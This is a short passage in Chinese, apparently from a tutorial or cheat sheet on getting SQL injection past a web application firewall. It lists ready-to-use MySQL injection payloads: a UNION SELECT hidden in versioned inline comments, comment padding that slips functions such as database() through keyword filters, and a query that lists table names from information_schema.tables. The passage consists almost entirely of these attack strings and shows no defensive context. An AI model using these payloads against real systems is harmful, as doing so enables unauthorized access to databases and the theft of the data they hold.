union select 被拦截,可以使用:-1' union /*!11440 select*/ 1,2#。
4.
函数绕过
user() 和 database() 等函数名结合括号会被拦截,使用内联注释绕过:-1' union /*!77777cz*//*!77777cz*/ select database/*!77777a*/(),2#。
5.
查表名
通过 information_schema.tables 或 mysql.innodb_index_stats 查询表名,使用内联注释绕过:-1' union /*!11440select*/ group_concat(table_name),2 from information_schema.tables where table_schema=database/*!77777cz*/()#。